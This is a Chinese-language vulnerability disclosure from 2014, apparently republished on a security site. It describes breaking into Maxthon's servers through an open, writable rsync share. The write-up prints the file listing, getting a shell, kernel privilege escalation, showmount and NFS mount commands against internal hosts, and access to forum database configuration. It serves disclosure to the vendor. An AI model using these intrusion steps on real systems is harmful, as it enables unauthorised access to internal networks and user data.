首页 > 安全 > 网络安全 >

傲游内网不完整漫游(大量内外网源码可被泄漏)

2014-12-29

本来看能不能证明接触到傲游用户的数据,结果发现被管理员发现了,仅仅接触到bbs用户详细说明:rsync未授权访问可写rsync 60 28 210 24::i mx drwxrwxr-x 8192 2014 12 23 19:10:44 -rw

本来看能不能证明接触到傲游用户的数据,结果发现被管理员发现了,仅仅接触到bbs用户

rsync未授权访问

可写

rsync  60.28.210.24::i.mx/ 
drwxrwxr-x        8192 2014/12/23 19:10:44 .
-rw-r--r--        6036 2013/10/21 13:30:47 build.txt
-rw-r--r--          31 2014/12/23 19:10:23 conf.php
-rw-rw-r--        1406 2013/10/21 13:30:49 favicon.ico
-rw-r--r--        7166 2014/01/13 15:40:28 feedback.htm
-rw-r--r--       55790 2014/01/13 15:40:28 index.htm
-rw-r--r--         132 2013/10/21 13:31:34 index.so.htm
-rw-r--r--         137 2013/10/21 13:31:34 index.v3.htm
lrwxrwxrwx          31 2014/02/20 17:52:51 key
-rw-r--r--          30 2013/10/21 13:31:37 test.php
-rw-r--r--         214 2013/05/30 15:00:17 ???ν???.url
-rw-r--r--         214 2011/10/14 17:35:44 ??\#2022??????\#212??\#227¥.url
-rw-r--r--         214 2013/10/21 13:31:39 ?\#202?游?\#212?\#227?.url
drwxrwxr-x        8192 2012/09/04 23:38:53 _old000
drwxr-xr-x        8192 2012/09/04 23:38:55 branch
drwxr-xr-x        8192 2013/11/06 16:14:21 chajian
drwxr-xr-x        8192 2014/01/13 15:59:24 css
drwxr-xr-x        8192 2014/08/01 11:34:51 data
drwxr-xr-x        8192 2013/10/21 14:46:07 decent_html
drwxr-xr-x        8192 2012/09/04 23:43:03 do_not_delete
drwxr-xr-x        8192 2014/01/03 19:17:48 html
drwxr-xr-x        8192 2013/11/07 17:36:03 i.maxthon.cn
drwxr-xr-x        8192 2012/09/04 23:42:36 i.mx_update
drwxr-xr-x        8192 2013/10/21 14:46:08 i.mximg
drwxrwxrwx        8192 2014/04/10 10:52:17 images
drwxr-xr-x        8192 2014/01/13 15:59:24 js
drwxr-xr-x        8192 2013/06/05 17:38:46 mac
drwxr-xr-x        8192 2013/08/01 15:31:19 mini
drwxr-xr-x        8192 2013/10/21 14:46:20 sound
drwxr-xr-x        8192 2013/05/20 18:05:43 test
drwxr-xr-x        8192 2013/05/20 18:05:43 tuan
drwxr-xr-x        8192 2013/05/20 18:05:43 v2.3.21
drwxr-xr-x        8192 2013/05/20 18:05:43 v2.3.22
drwxr-xr-x        8192 2013/05/20 18:05:43 v2.3.23
drwxrwxr-x        8192 2013/05/20 18:05:43 v3beta
drwxr-xr-x        8192 2014/01/03 19:08:28 widget



访问web发现不存在这些文件,根据i.mx猜测是i.maxthon.cn

ping i.maxthon.cn发现ip不对

果断绑定host到i.maxthon.cn 60.28.210.24

成功访问到本目录文件 getshell

Snip20141223_8.png

分析发现

glusterfs#192.168.0.166:/other

504G 160G 320G 34% /mnt/nfs

nfs挂载目录

大量源码泄露

Snip20141223_9.png


[/]$ showmount -e 192.168.0.166
Export list for 192.168.0.166:
/other *
/bbs   *



发现166下还有一个bbs目录

/]$ uname -a
Linux cms13393 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64 x86_64 x86_64 GNU/Linux



本机内核版本低 导致提权

Snip20141223_10.png



nfs挂载

mount -t nfs 192.168.0.166:/bbs /tmp/nfs


Snip20141223_12.png



论坛成功挂载 bbs.maxthon.cn

查看数据库配置 可连接

Snip20141223_13.png


证明过程中发现管理员在看日志 停止测试 提交

root     28678  0.0  0.0  58896   536 pts/0    S+   21:50   0:00 tail -f mx.13393/access_20141223.log
root     28703  0.0  0.0  88936  3252 ?        Ss   21:50   0:00 sshd: root [priv]
sshd     28704  0.0  0.0  64096  1460 ?        S    21:50   0:00 sshd: root [net] 
root     28712  0.0  0.0  10456   872 ?        R    21:50   0:00 ps -aux
root     30487  0.0  0.0 102004   916 ?        S    Feb09   0:00 crond
root     30488  0.0  0.0   8696   828 ?        Ss   Feb09   0:00 /bin/bash -c /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php > /dev/null 2>&1
root     30511  0.0  0.1  91052  4448 ?        S    Feb09   0:03 /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php
sh-3.2# who
songqi   pts/0        Dec 23 21:42 (10.0.8.249)
skyyuan  pts/1        Dec 23 21:44 (10.0.8.249)

解决方案:

加强过滤

相关文章
最新文章
热点推荐